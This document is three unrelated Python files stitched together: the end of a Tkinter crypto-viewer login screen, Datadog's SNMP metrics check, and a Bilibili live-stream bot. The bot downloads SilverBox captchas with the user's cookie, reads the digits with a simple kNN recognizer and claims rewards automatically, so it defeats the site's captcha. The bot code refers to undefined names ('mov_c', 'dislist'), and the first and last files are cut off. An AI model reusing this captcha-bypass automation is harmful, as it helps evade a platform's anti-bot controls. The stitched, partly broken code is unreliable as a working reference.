lb_loading_eth = Label(info_frame, text=txt_info_4, border="0", bg='#111111', fg="white", font="Segoe 15 bold")
lb_loading_eth.place(relwidth=1, relheight=0.1, rely=0.6)
# MAIN INITIAL FRAME
root = Tk()
root.configure(background='#111111')
root.title("Crypto Viewer")
root.attributes('-fullscreen', True)
# HEADER
headerFrame = Frame(root, background='#111111')
headerFrame.place(relwidth=1, relheight=0.2)
logo = Label(headerFrame, text="Crypto Viewer", background='#111111', font="Segoe 30 bold", fg="white")
logo.place(relwidth=1, relheight=1)
def exit():
root.destroy()
exit_bttn = Button(headerFrame, text="X", border="0", bg='#FF0000', fg="white", font="Segoe 20 bold", cursor="hand2", command=exit)
exit_bttn.place(relwidth=0.03, relheight=0.25, relx=0.97)
# LOGIN
LoginFrame = Frame(root, background='#111111')
LoginFrame.place(relwidth=1, relheight=0.6, rely=0.2)
l_entrar = Label(LoginFrame, text="ENTRAR", background='#111111', font="Segoe 15 bold", fg="white")
l_entrar.place(relwidth=1, relheight=0.2)
l_email = Label(LoginFrame, text="Usuário", background='#111111', font="Segoe 15", fg="white")
l_email.place(relwidth=1, relheight=0.2, rely=0.15)
txtboxemail_log = Entry(LoginFrame, bg="#222222", border=0, fg="white", font="Segoe 15")
txtboxemail_log.place(relwidth=0.3, relheight=0.05, relx=0.35, rely=0.3)
l_pass = Label(LoginFrame, text="Senha", background='#111111', font="Segoe 15", fg="white")
l_pass.place(relwidth=1, relheight=0.2, rely=0.35)
txtboxpass_log = Entry(LoginFrame, bg="#222222", border=0, fg="white", font="Segoe 15", show="*")
txtboxpass_log.place(relwidth=0.3, relheight=0.05, relx=0.35, rely=0.5)
login_bttn = Button(LoginFrame, text="ENTRAR", border="0", bg='#222222', fg="white", font="Segoe 20 bold", cursor="hand2", command=entrar)
login_bttn.place(relwidth=0.1, relheight=0.085, relx=0.45, rely=0.75)
login_bttn = Button(LoginFrame, text="?", border="0", bg='white', fg="black", font="Segoe 16 bold", cursor="hand2", command=info)
login_bttn.place(relwidth=0.02, relheight=0.06, relx=0.8, rely=0.9)
# RUN ROOT
root.mainloop()
|
snmp.py
|
# (C) Datadog, Inc. 2010-2019
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
import threading
import time
from collections import defaultdict
import pysnmp.proto.rfc1902 as snmp_type
import yaml
from pyasn1.codec.ber import decoder
from pysnmp import hlapi
from pysnmp.error import PySnmpError
from pysnmp.smi import builder
from pysnmp.smi.exval import noSuchInstance, noSuchObject
from six import iteritems
from datadog_checks.base import AgentCheck, ConfigurationError, is_affirmative
from datadog_checks.base.errors import CheckException
from .config import InstanceConfig
# Additional types that are not part of the SNMP protocol. cf RFC 2856
CounterBasedGauge64, ZeroBasedCounter64 = builder.MibBuilder().importSymbols(
'HCNUM-TC', 'CounterBasedGauge64', 'ZeroBasedCounter64'
)
# Metric type that we support
SNMP_COUNTERS = frozenset([snmp_type.Counter32.__name__, snmp_type.Counter64.__name__, ZeroBasedCounter64.__name__])
SNMP_GAUGES = frozenset(
[
snmp_type.Gauge32.__name__,
snmp_type.Unsigned32.__name__,
CounterBasedGauge64.__name__,
snmp_type.Integer.__name__,
snmp_type.Integer32.__name__,
]
)
DEFAULT_OID_BATCH_SIZE = 10
def reply_invalid(oid):
return noSuchInstance.isSameTypeWith(oid) or noSuchObject.isSameTypeWith(oid)
class SnmpCheck(AgentCheck):
SC_STATUS = 'snmp.can_check'
_running = True
_NON_REPEATERS = 0
_MAX_REPETITIONS = 25
def __init__(self, name, init_config, instances):
super(SnmpCheck, self).__init__(name, init_config, instances)
# Set OID batch size
self.oid_batch_size = int(init_config.get('oid_batch_size', DEFAULT_OID_BATCH_SIZE))
# Load Custom MIB directory
self.mibs_path = init_config.get('mibs_folder')
self.ignore_nonincreasing_oid = is_affirmative(init_config.get('ignore_nonincreasing_oid', False))
self.profiles = init_config.get('profiles', {})
self.profiles_by_oid = {}
for profile, profile_data in self.profiles.items():
filename = profile_data.get('definition_file')
if filename:
try:
with open(filename) as f:
data = yaml.safe_load(f)
except Exception:
raise ConfigurationError("Couldn't read profile '{}' in '{}'".format(profile, filename))
else:
data = profile_data['definition']
self.profiles[profile] = {'definition': data}
sys_object_oid = profile_data.get('sysobjectid')
if sys_object_oid:
self.profiles_by_oid[sys_object_oid] = profile
self.instance['name'] = self._get_instance_key(self.instance)
self._config = InstanceConfig(
self.instance,
self.warning,
self.init_config.get('global_metrics', []),
self.mibs_path,
self.profiles,
self.profiles_by_oid,
)
if self._config.ip_network:
self._thread = threading.Thread(target=self.discover_instances, name=self.name)
self._thread.daemon = True
self._thread.start()
def _get_instance_key(self, instance):
key = instance.get('name')
if key:
return key
ip = instance.get('ip_address')
port = instance.get('port')
if ip and port:
key = '{host}:{port}'.format(host=ip, port=port)
else:
key = ip
return key
def discover_instances(self):
config = self._config
discovery_interval = config.instance.get('discovery_interval', 3600)
while self._running:
start_time = time.time()
for host in config.ip_network.hosts():
host = str(host)
if host in config.discovered_instances:
continue
instance = config.instance.copy()
instance.pop('network_address')
instance['ip_address'] = host
host_config = InstanceConfig(
instance,
self.warning,
self.init_config.get('global_metrics', []),
self.mibs_path,
self.profiles,
self.profiles_by_oid,
)
try:
sys_object_oid = self.fetch_sysobject_oid(host_config)
except Exception as e:
self.log.debug("Error scanning host %s: %s", host, e)
continue
if sys_object_oid not in self.profiles_by_oid:
if not (host_config.table_oids or host_config.raw_oids):
self.log.warn("Host %s didn't match a profile for sysObjectID %s", host, sys_object_oid)
continue
else:
profile = self.profiles_by_oid[sys_object_oid]
host_config.refresh_with_profile(self.profiles[profile], self.warning)
config.discovered_instances[host] = host_config
time_elapsed = time.time() - start_time
if discovery_interval - time_elapsed > 0:
time.sleep(discovery_interval - time_elapsed)
def raise_on_error_indication(self, error_indication, ip_address):
if error_indication:
message = '{} for instance {}'.format(error_indication, ip_address)
raise CheckException(message)
def check_table(self, config, table_oids):
"""
Perform a snmpwalk on the domain specified by the oids, on the device
configured in instance.
Returns a dictionary:
dict[oid/metric_name][row index] = value
In case of scalar objects, the row index is just 0
"""
results = defaultdict(dict)
enforce_constraints = config.enforce_constraints
oids = []
bulk_oids = []
# Use bulk for SNMP version > 1 and there are enough symbols
bulk_limit = config.bulk_threshold if config.auth_data.mpModel else 0
for table, symbols in table_oids.items():
if not symbols:
# No table to browse, just one symbol
oids.append(table)
elif len(symbols) < bulk_limit:
oids.extend(symbols)
else:
bulk_oids.append(table)
all_binds, error = self.fetch_oids(config, oids, enforce_constraints=enforce_constraints)
for oid in bulk_oids:
try:
self.log.debug('Running SNMP command getBulk on OID %s', oid)
binds_iterator = config.call_cmd(
hlapi.bulkCmd,
self._NON_REPEATERS,
self._MAX_REPETITIONS,
oid,
lookupMib=enforce_constraints,
ignoreNonIncreasingOid=self.ignore_nonincreasing_oid,
lexicographicMode=False,
)
binds, error = self._consume_binds_iterator(binds_iterator, config)
all_binds.extend(binds)
except PySnmpError as e:
message = 'Failed to collect some metrics: {}'.format(e)
if not error:
error = message
self.warning(message)
for result_oid, value in all_binds:
if not enforce_constraints:
# if enforce_constraints is false, then MIB resolution has not been done yet
# so we need to do it manually. We have to specify the mibs that we will need
# to resolve the name.
oid_to_resolve = hlapi.ObjectIdentity(result_oid.asTuple()).loadMibs(*config.mibs_to_load)
result_oid = oid_to_resolve.resolveWithMib(config.mib_view_controller)
_, metric, indexes = result_oid.getMibSymbol()
results[metric][indexes] = value
self.log.debug('Raw results: %s', results)
# Freeze the result
results.default_factory = None
return results, error
def check_raw(self, config, oids):
"""
Perform a snmpwalk on the domain specified by the oids, on the device
configured in instance.
Returns a dictionary:
dict[oid/metric_name] = value
In case of scalar objects, the row index is just 0
"""
all_binds, error = self.fetch_oids(config, oids, enforce_constraints=False)
results = {}
for result_oid, value in all_binds:
oid = result_oid.asTuple()
matching = '.'.join(str(i) for i in oid)
results[matching] = value
self.log.debug('Raw results: %s', results)
return results, error
def fetch_oids(self, config, oids, enforce_constraints):
# UPDATE: We used to perform only a snmpgetnext command to fetch metric values.
# It returns the wrong value when the OID passeed is referring to a specific leaf.
# For example:
# snmpgetnext -v2c -c public localhost:11111 1.3.6.1.2.1.25.4.2.1.7.222
# iso.3.6.1.2.1.25.4.2.1.7.224 = INTEGER: 2
# SOLUTION: perform a snmpget command and fallback with snmpgetnext if not found
error = None
first_oid = 0
all_binds = []
while first_oid < len(oids):
try:
oids_batch = oids[first_oid : first_oid + self.oid_batch_size]
self.log.debug('Running SNMP command get on OIDS %s', oids_batch)
error_indication, error_status, _, var_binds = next(
config.call_cmd(hlapi.getCmd, *oids_batch, lookupMib=enforce_constraints)
)
self.log.debug('Returned vars: %s', var_binds)
self.raise_on_error_indication(error_indication, config.ip_address)
missing_results = []
for var in var_binds:
result_oid, value = var
if reply_invalid(value):
oid_tuple = result_oid.asTuple()
missing_results.append(hlapi.ObjectType(hlapi.ObjectIdentity(oid_tuple)))
else:
all_binds.append(var)
if missing_results:
# If we didn't catch the metric using snmpget, try snmpnext
# Don't walk through the entire MIB, stop at end of table
self.log.debug('Running SNMP command getNext on OIDS %s', missing_results)
binds_iterator = config.call_cmd(
hlapi.nextCmd,
*missing_results,
lookupMib=enforce_constraints,
ignoreNonIncreasingOid=self.ignore_nonincreasing_oid,
lexicographicMode=False
)
binds, error = self._consume_binds_iterator(binds_iterator, config)
all_binds.extend(binds)
except PySnmpError as e:
message = 'Failed to collect some metrics: {}'.format(e)
if not error:
error = message
self.warning(message)
# if we fail move onto next batch
first_oid += self.oid_batch_size
return all_binds, error
def fetch_sysobject_oid(self, config):
"""Return the sysObjectID of the instance."""
# Reference sysObjectID directly, see http://oidref.com/1.3.6.1.2.1.1.2
oid = hlapi.ObjectType(hlapi.ObjectIdentity((1, 3, 6, 1, 2, 1, 1, 2)))
self.log.debug('Running SNMP command on OID %s', oid)
error_indication, _, _, var_binds = next(config.call_cmd(hlapi.nextCmd, oid, lookupMib=False))
self.raise_on_error_indication(error_indication, config.ip_address)
self.log.debug('Returned vars: %s', var_binds)
return var_binds[0][1].prettyPrint()
def _consume_binds_iterator(self, binds_iterator, config):
all_binds = []
error = None
for error_indication, error_status, _, var_binds_table in binds_iterator:
self.log.debug('Returned vars: %s', var_binds_table)
self.raise_on_error_indication(error_indication, config.ip_address)
if error_status:
message = '{} for instance {}'.format(error_status.prettyPrint(), config.ip_address)
error = message
# submit CRITICAL service check if we can't connect to device
if 'unknownUserName' in message:
self.log.error(message)
else:
self.warning(message)
all_binds.extend(var_binds_table)
return all_binds, error
def check(self, instance):
"""
Perform two series of SNMP requests, one for all that have MIB associated
and should be looked up and one for those specified by oids.
"""
config = self._config
if instance.get('network_address'):
for host, discovered in list(config.discovered_instances.items()):
if self._check_with_config(discovered):
config.failing_instances[host] += 1
if config.failing_instances[host] > config.allowed_failures:
# Remove it from discovered instances, we'll re-discover it later if it reappears
config.discovered_instances.pop(host)
# Reset the failure counter as well
config.failing_instances.pop(host)
else:
# Reset the counter if not's failing
config.failing_instances.pop(host, None)
else:
self._check_with_config(config)
def _check_with_config(self, config):
# Reset errors
instance = config.instance
error = table_results = raw_results = None
try:
if not (config.table_oids or config.raw_oids):
sys_object_oid = self.fetch_sysobject_oid(config)
if sys_object_oid not in self.profiles_by_oid:
raise ConfigurationError('No profile matching sysObjectID {}'.format(sys_object_oid))
profile = self.profiles_by_oid[sys_object_oid]
config.refresh_with_profile(self.profiles[profile], self.warning)
if config.table_oids:
self.log.debug('Querying device %s for %s oids', config.ip_address, len(config.table_oids))
table_results, error = self.check_table(config, config.table_oids)
self.report_table_metrics(config.metrics, table_results, config.tags)
if config.raw_oids:
self.log.debug('Querying device %s for %s oids', config.ip_address, len(config.raw_oids))
raw_results, error = self.check_raw(config, config.raw_oids)
self.report_raw_metrics(config.metrics, raw_results, config.tags)
except CheckException as e:
error = str(e)
self.warning(error)
except Exception as e:
if not error:
error = 'Failed to collect metrics for {} - {}'.format(instance['name'], e)
self.warning(error)
finally:
# Report service checks
sc_tags = ['snmp_device:{}'.format(instance['ip_address'])]
sc_tags.extend(instance.get('tags', []))
status = self.OK
if error:
status = self.CRITICAL
if raw_results or table_results:
status = self.WARNING
self.service_check(self.SC_STATUS, status, tags=sc_tags, message=error)
return error
def report_raw_metrics(self, metrics, results, tags):
"""
For all the metrics that are specified as oid,
the conf oid is going to exactly match or be a prefix of the oid sent back by the device
Use the instance configuration to find the name to give to the metric
Submit the results to the aggregator.
"""
for metric in metrics:
if 'OID' in metric:
forced_type = metric.get('forced_type')
queried_oid = metric['OID'].lstrip('.')
if queried_oid in results:
value = results[queried_oid]
else:
for oid in results:
if oid.startswith(queried_oid):
value = results[oid]
break
else:
self.log.warning('No matching results found for oid %s', queried_oid)
continue
name = metric.get('name', 'unnamed_metric')
metric_tags = tags
if metric.get('metric_tags'):
metric_tags = metric_tags + metric.get('metric_tags')
self.submit_metric(name, value, forced_type, metric_tags)
def report_table_metrics(self, metrics, results, tags):
"""
For each of the metrics specified as needing to be resolved with mib,
gather the tags requested in the instance conf for each row.
Submit the results to the aggregator.
"""
for metric in metrics:
forced_type = metric.get('forced_type')
if 'table' in metric:
index_based_tags = []
column_based_tags = []
for metric_tag in metric.get('metric_tags', []):
tag_key = metric_tag['tag']
if 'index' in metric_tag:
index_based_tags.append((tag_key, metric_tag.get('index')))
elif 'column' in metric_tag:
column_based_tags.append((tag_key, metric_tag.get('column')))
else:
self.log.warning('No indication on what value to use for this tag')
for value_to_collect in metric.get('symbols', []):
for index, val in iteritems(results[value_to_collect]):
metric_tags = tags + self.get_index_tags(index, results, index_based_tags, column_based_tags)
self.submit_metric(value_to_collect, val, forced_type, metric_tags)
elif 'symbol' in metric:
name = metric['symbol']
result = list(results[name].items())
if len(result) > 1:
self.log.warning('Several rows corresponding while the metric is supposed to be a scalar')
continue
val = result[0][1]
metric_tags = tags
if metric.get('metric_tags'):
metric_tags = metric_tags + metric.get('metric_tags')
self.submit_metric(name, val, forced_type, metric_tags)
elif 'OID' in metric:
pass # This one is already handled by the other batch of requests
else:
raise ConfigurationError('Unsupported metric in config file: {}'.format(metric))
def get_index_tags(self, index, results, index_tags, column_tags):
"""
Gather the tags for this row of the table (index) based on the
results (all the results from the query).
index_tags and column_tags are the tags to gather.
- Those specified in index_tags contain the tag_group name and the
index of the value we want to extract from the index tuple.
cf. 1 for ipVersion in the IP-MIB::ipSystemStatsTable for example
- Those specified in column_tags contain the name of a column, which
could be a potential result, to use as a tage
cf. ifDescr in the IF-MIB::ifTable for example
"""
tags = []
for idx_tag in index_tags:
tag_group = idx_tag[0]
try:
tag_value = index[idx_tag[1] - 1].prettyPrint()
except IndexError:
self.log.warning('Not enough indexes, skipping this tag')
continue
tags.append('{}:{}'.format(tag_group, tag_value))
for col_tag in column_tags:
tag_group = col_tag[0]
try:
tag_value = results[col_tag[1]][index]
except KeyError:
self.log.warning('Column %s not present in the table, skipping this tag', col_tag[1])
continue
if reply_invalid(tag_value):
self.log.warning("Can't deduct tag from column for tag %s", tag_group)
continue
tag_value = tag_value.prettyPrint()
tags.append('{}:{}'.format(tag_group, tag_value))
return tags
def submit_metric(self, name, snmp_value, forced_type, tags=None):
"""
Convert the values reported as pysnmp-Managed Objects to values and
report them to the aggregator.
"""
tags = [] if tags is None else tags
if reply_invalid(snmp_value):
# Metrics not present in the queried object
self.log.warning('No such Mib available: %s', name)
return
metric_name = self.normalize(name, prefix='snmp')
if forced_type:
if forced_type.lower() == 'gauge':
value = int(snmp_value)
self.gauge(metric_name, value, tags)
elif forced_type.lower() == 'counter':
value = int(snmp_value)
self.rate(metric_name, value, tags)
else:
self.warning('Invalid forced-type specified: {} in {}'.format(forced_type, name))
raise ConfigurationError('Invalid forced-type in config file: {}'.format(name))
return
# Ugly hack but couldn't find a cleaner way
# Proper way would be to use the ASN1 method isSameTypeWith but it
# wrongfully returns True in the case of CounterBasedGauge64
# and Counter64 for example
snmp_class = snmp_value.__class__.__name__
if snmp_class in SNMP_COUNTERS:
value = int(snmp_value)
self.rate(metric_name, value, tags)
return
if snmp_class in SNMP_GAUGES:
value = int(snmp_value)
self.gauge(metric_name, value, tags)
return
if snmp_class == 'Opaque':
# Try support for floats
try:
value = float(decoder.decode(bytes(snmp_value))[0])
except Exception:
pass
else:
self.gauge(metric_name, value, tags)
return
# Falls back to try to cast the value.
try:
value = float(snmp_value)
except ValueError:
pass
else:
self.gauge(metric_name, value, tags)
return
self.log.warning('Unsupported metric type %s for %s', snmp_class, metric_name)
|
koriru1.2C-GUI.py
|
#分割1时大概会在20~40列,其它数字大概在80~100列
from PIL import Image
import numpy as np
import os,sys,time
import progressbar
import copy as cp
import requests
import json,base64
import tkinter.filedialog
import tkinter as tk
import threading
wid=['[',progressbar.Timer(),']',progressbar.Bar(),'(',progressbar.ETA(),')',]
def check_dot(mmp):#传入一个矩阵,检查里面有没有直径20的圆,返回一个记录这些圆心的矩阵
aap=cp.deepcopy(mmp)
for ii in progressbar.progressbar(range(len(mmp)),widgets=wid):
for jj in range(len(mmp[ii])):
rou_ctr=0
if mmp[ii][jj]!=255 and ii>9 and jj>9 and ii<len(mmp)-10 and jj<len(mmp[ii])-10:
for k in range(ii-10,ii+10):
for l in range(jj-10,jj+10):
if mmp[k][l]!=255:
rou_ctr=rou_ctr+1
if rou_ctr>=400:
aap[ii][jj]=255
else:
aap[ii][jj]=0
updatePb(ii,len(mmp))
return aap
def split_text_on_pic(mmp,cutctr):#从传入矩阵中分割文字,返回两个切开的图
cut_col=0
for jj in range(len(mmp[0])):
color=0
for ii in range(len(mmp)):
if mmp[ii][jj]!=0:
color=1
if color==0:
cut_col=jj
break
#np.savetxt(os.path.dirname(sys.path[0])+'\\WA.txt',mmp)
a=Image.fromarray(mmp)
#a.show()
#Image.fromarray(mmp).save(os.path.dirname(sys.path[0])+'\\WAA.gif')
least_color=19260817
if cut_col>105 or (cut_col==0 and len(mmp[0]))>105:
for jj in range(20,40):
col_color=0
for ii in range(len(mmp)):
if mmp[ii][jj]!=0:
col_color=col_color+1
if col_color<least_color:
least_color=col_color
cut_col=jj
for jj in range(80,105):
col_color=0
for ii in range(len(mmp)):
if mmp[ii][jj]!=0:
col_color=col_color+1
if col_color<least_color:
least_color=col_color
cut_col=jj
if cut_col==0 and len(mmp[0])>55 and cutctr!=3:
for jj in range(45,55):
col_color=0
for ii in range(len(mmp)):
if mmp[ii][jj]!=0:
col_color+=1
if col_color<least_color:
least_color=col_color
if least_color<6:
cut_col=jj
#print('leastcolor:%d' % least_color)
#print('cut_col:%d' % cut_col)
re1=a.crop((0,0,cut_col,len(mmp)))
re2=a.crop((cut_col+1,0,len(mmp[0]),len(mmp)))
#if cut_col>102:
#re1.show()
#re1.save(os.path.dirname(sys.path[0])+'\\WA'+input('文件名:')+'.gif')
return re1,re2
def compare_study_and_example(exam_map):
study_dir=os.path.dirname(sys.path[0])+'\\学习'
study_list=os.listdir(study_dir)
source_init=Image.new('L',(250,250))
source_init_idx=np.array(source_init)
distinguish_text=[]
is_okay=1
for repeat4times in range(4):
splited,rest=split_text_on_pic(exam_map,repeat4times)
#splited.save(os.path.dirname(sys.path[0])+'\\WAc%d.gif' % repeat4times)
#Image.fromarray(exam_map).show()
#rest.show()
arrsplited=np.array(splited)
if repeat4times==2:
if splited.size[0]==0:
distinguish_text[1]=1
distinguish_text.append('-')
is_okay=0
continue
pix_counter=0
for ii in range(len(arrsplited)):
for jj in range(len(arrsplited[ii])):
if arrsplited[ii][jj]!=0:
pix_counter=pix_counter+1
#print(pix_counter)
if pix_counter>1400:
distinguish_text.append('+')
print('+')
else:
distinguish_text.append('-')
print('-')
else:
if repeat4times==3:
arrsplited=np.array(rest)
rrr,ccc=center_of_gravity(arrsplited)
#if repeat4times!=3 and splited.size[0]==0:
#split_text_on_pic(np.array(chk_before))
mr=125-rrr
mc=125-ccc
for ii in range(len(arrsplited)):
for jj in range(len(arrsplited[ii])):
if ii+mr>=250 or jj-mov_c>=250:
continue
source_init_idx[ii+mr][jj+mc]=arrsplited[ii][jj]
source_init=Image.fromarray(source_init_idx)
DistLeaderboard=[]
TagsLeaderboard=[]
for sample in study_list:
file_name=study_dir+'\\'+sample
#print(file_name)
now=np.array(Image.open(file_name))
#print(now)
study_init=Image.new('L',(250,250))
study_init_idx=np.array(study_init)
rrr,ccc=center_of_gravity(now)
mr=125-rrr
mc=125-ccc
for ii in range(len(now)):
for jj in range(len(now[ii])):
if ii+mr>=250 or jj-mov_c>=250:
continue
study_init_idx[ii+mr][jj+mc]=now[ii][jj]*255#如果去掉这个*255了话预览效果会很不好
#print(study_init)
study_init=Image.fromarray(study_init_idx)
DistLeaderboard.append(sum(sum((source_init_idx-study_init_idx)**2)))
TagsLeaderboard.append(sample[:1])
ranking=np.argsort(DistLeaderboard)
TagsCounter={}
for kk in range(3):#knn
CurrentTag=TagsLeaderboard[ranking[kk]]
TagsCounter[CurrentTag]=TagsCounter.get(CurrentTag,0)+1
MaxTagCtr=0
for CurrentTag,Number in TagsCounter.items():
if Number>MaxTagCtr:
MaxTagCtr=Number
ResultTag=CurrentTag
print(ResultTag)
#with open(os.path.dirname(sys.path[0])+'\\res.txt','a') as fi:
# fi.write(ResultTag+'\n')
distinguish_text.append(ResultTag)
exam_map=np.array(rest.crop(scan_dark_pixs(rest)))
chk_before=splited
#rest.crop(scan_dark_pixs(rest)).save(os.path.dirname(sys.path[0])+'\\Wcropc%d.gif' % repeat4times)
#print(distinguish_text)
if distinguish_text[2]=='+':
return int(distinguish_text[0])*10+int(distinguish_text[1])+int(distinguish_text[3]),distinguish_text,is_okay
else:
return int(distinguish_text[0])*10+int(distinguish_text[1])-int(distinguish_text[3]),distinguish_text,is_okay
def figure_fst_and_last(mymap):#检查矩阵里面第一个和最后一个白块的行数和列数,用于搭配旋转使用,返回他们的行列
fst=0
for ii in range(len(mymap)):
for jj in range(len(mymap[ii])):
if mymap[ii][jj]!=0:
if fst==0:
fst_raw=ii
fst_col=jj
fst=1
last_raw=ii
last_col=jj
return fst_raw,fst_col,last_raw,last_col
def rotate_check(mmp):#检查旋转方法,传入一个矩阵,返回旋转以后摆的最正的图和最优角度
#print('#####################new img#######################')
fst=0
fst_raw,fst_col,last_raw,last_col=figure_fst_and_last(mmp)
leasthei=last_raw-fst_raw
leastdeg=rotdeg=0
leastmap=mmp
if fst_col<last_col:
for rotdeg in range(1,50):
tp_map=np.array(Image.fromarray(mmp).rotate(rotdeg))
fst_raw,fst_col,last_raw,last_col=figure_fst_and_last(tp_map)
#print('rotdeg:%d,hei:%d,lhei:%d' % (rotdeg,last_raw-fst_raw,leasthei))
if last_raw-fst_raw<leasthei:
leasthei=last_raw-fst_raw
leastmap=tp_map
leastdeg=rotdeg
elif last_raw-fst_raw>leasthei:
break
else:
for rotdeg in range(0,-50,-1):
tp_map=np.array(Image.fromarray(mmp).rotate(rotdeg))
fst_raw,fst_col,last_raw,last_col=figure_fst_and_last(tp_map)
#print('rotdeg:%d,hei:%d,lhei:%d' % (rotdeg,last_raw-fst_raw,leasthei))
if last_raw-fst_raw<leasthei:
leasthei=last_raw-fst_raw
leastmap=tp_map
leastdeg=rotdeg
elif last_raw-fst_raw>leasthei:
break
return Image.fromarray(leastmap),leastdeg
def shadow_split(arrays):#将图片上的灰边分离,用于寻找重心移动图片,传入原图矩阵,传出灰边矩阵
w=255
b=37
zero_one_map=[]
for col in arrays:
zero_one_map_col=[]
for single_var in col:
if single_var!=w and single_var!=b:
zero_one_map_col.append(255)
else:
zero_one_map_col.append(0)
zero_one_map.append(zero_one_map_col)
#with open(os.path.dirname(sys.path[0])+'\\shadow.gif') as fii:
#Image.fromarray(np.array(zero_one_map)).show()
#os.system('pause')
return np.array(zero_one_map)
def center_of_gravity(map_source):#计算重心,其实这个方法可以合并到上面,传入矩阵,返回重心的行,列
pctr=sumr=sumc=0
for rr in range(len(map_source)):
for cc in range(len(map_source[rr])):
if map_source[rr][cc]!=0:
pctr=pctr+1
sumr=sumr+rr
sumc=sumc+cc
#print('another algorithm:%d,%d' % (round(sumr/pctr),round(sumc/pctr)))
nearest_c=round(sumc/pctr)
nearest_r=round(sumr/pctr)
return nearest_r,nearest_c
def scan_dark_pixs(pic):#计算黑边,传入图片,返回一个正好与黑边相切的图的裁切元组
mmp=np.array(pic)
hei=len(mmp)
wid=len(mmp[0])
hitari=migi=shita=ue=0
for iii in range(hei):
for jjj in range(wid):
if mmp[iii][jjj]!=0:
ue=iii
break
if ue!=0:
break
for jjj in range(wid):
for iii in range(hei):
if mmp[iii][jjj]!=0:
hitari=jjj
break
if hitari!=0:
break
for iii in range(hei-1,-1,-1):
for jjj in range(wid-1,-1,-1):
if mmp[iii][jjj]!=0:
shita=iii+1
break
if shita!=0:
break
for jjj in range(wid-1,-1,-1):
for iii in range(hei-1,-1,-1):
if mmp[iii][jjj]!=0:
migi=jjj+1
break
if migi!=0:
break
tur=(hitari-1,ue-1,migi,shita)
#print(tur)
return tur
def make_req(ck):
ac='application/json, text/plain, */*'
ace='gzip, deflate, sdch, br'
acl='zh-CN,zh;q=0.8'
cn='keep-alive'
hst='api.live.bilibili.com'
ogn='https://live.bilibili.com'
ref='https://live.bilibili.com/546432'
ua='Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'
hds={
'Accept':ac,
'Accept-Encoding':ace,
'Accept-Language':acl,
'Connection':cn,
'Cookie':ck,
'Host':hst,
'Origin':ogn,
'Referer':ref,
'User-Agent':ua
}
lnk='https://api.live.bilibili.com/lottery/v1/SilverBox/getCaptcha?ts=%d' % int(time.time())
req=requests.get(lnk,headers=hds)
json_convert=json.loads(req.content)
pngf=base64.b64decode(json_convert['data']['img'][23:])
with open(os.path.dirname(sys.path[0])+'\\'+'temp.png','wb') as f:
f.write(pngf)
return open(os.path.dirname(sys.path[0])+'\\'+'temp.png','rb')
def getCurrentTask(ck):
url='https://api.live.bilibili.com/lottery/v1/SilverBox/getCurrentTask'
hds={
'Accept':'application/json, text/plain, */*',
'Accept-Encoding':'gzip, deflate, sdch, br',
'Accept-Language':'zh-CN,zh;q=0.8',
'Connection':'keep-alive',
'Cache-Control':'no-cache',
'Connection':'keep-alive',
'Cookie':ck,
'Host':'api.live.bilibili.com',
'Origin':'https://live.bilibili.com',
'Referer':'https://live.bilibili.com/546432',
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'
}
req=requests.get(url,headers=hds)
jjson=json.loads(req.content)
# print(jjson['data']['minute'])
# print(jjson['data']['time_start'])
# print(jjson['data']['time_end'])
return jjson['data']['time_start'],jjson['data']['time_end']
def getAward(ck,vercode_data,proimg,dislist,istu,iso,timeS,timeE):
lnk='https://api.live.bilibili.com/lottery/v1/SilverBox/getAward?time_start=%d&end_time=%d&captcha=%d' % (timeS,timeE,vercode_data)
hds={
'Accept':'application/json, text/plain, */*',
'Accept-Encoding':'gzip, deflate, sdch, br',
'Accept-Language':'zh-CN,zh;q=0.8',
'Connection':'keep-alive',
'Cache-Control':'no-cache',
'Cookie':ck,
'Host':'api.live.bilibili.com',
'Origin':'https://live.bilibili.com',
'Referer':'https://live.bilibili.com/1',
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'
}
response_raw=requests.get(lnk,headers=hds)
#print(response_raw.content)
convertJson=json.loads(response_raw.content)
print(convertJson)
#lbmsg.set(convertJson)
statusText.config(state=tk.NORMAL)
#statusText.insert(tk.END,convertJson['msg']+'\n')
currentTime=time.asctime(time.localtime(time.time()))
if convertJson['msg']=='ok':
print('领取成功,获得瓜子:%s,当前瓜子为%s。' % (convertJson['data']['awardSilver'],convertJson['data']['silver']))
statusText.insert(tk.END,'%s:领取成功,获得瓜子:%s,当前瓜子为%s。\n' % (currentTime,convertJson['data']['awardSilver'],convertJson['data']['silver']))
study_(proimg,istu,iso)
statusText.config(state=tk.DISABLED)
def study_(giff,swi,chk):
if swi==1 and chk==1:
print('开始学习')
for studying in range(4):
matrix_a,matrix_b=split_text_on_pic(giff,studying)
if studying==3:
targ=matrix_b
else:
targ=matrix_a
for name_ctr in range(10):
if studying==2:
break
if os.path.exists(os.path.dirname(sys.path[0])+'\\学习\\'+dislist[studying]+'-'+str(name_ctr)+'.gif'):
continue
else:
print(targ)
targ=targ.crop(scan_dark_pixs(targ))
targ.save(os.path.dirname(sys.path[0])+'\\学习\\'+dislist[studying]+'-'+str(name_ctr)+'.gif')
#Image.fromarray(targ).crop(scan_dark_pixs(Image.fromarray(targ))).save(os.path.dirname(sys.path[0])+'\\学习\\'+dislist[studying]+'-'+str(name_ctr)+'.gif')
print('保存学习文件:'+dislist[studying]+'-'+str(name_ctr)+'.gif')
statusText.config(state=tk.NORMAL)
statusText.insert(tk.END,'保存学习文件:'+dislist[studying]+'-'+str(name_ctr)+'.gif\n')
statusText.config(state=tk.DISABLED)
break
giff=np.array(matrix_b.crop(scan_dark_pixs(matrix_b)))
else:
print('学习开关已关闭或分割出现问题不能学习')
#init_ck=input('请输入您的cookie【仅用于申请验证码】:')
def statuswin():
print('GUI线程启动')
global win
win=tk.Tk()
win.title("状态窗")
win.geometry('600x600')
# global lbmsg
# lbmsg=tk.StringVar()
# lbwin=tk.Label(win,textvariable=lbmsg).pack()
# lbmsg.set('有状态的话会显示在这里哦')
global statusText
statusText=tk.Text(win,width=70,height=40)
statusText.insert(tk.END,'这里是状态显示栏\n')
statusText.config(state=tk.DISABLED)
statusText.pack()
global cav
cav=tk.Canvas(win,width=300,height=21,bg="white")
#x=tk.StringVar()
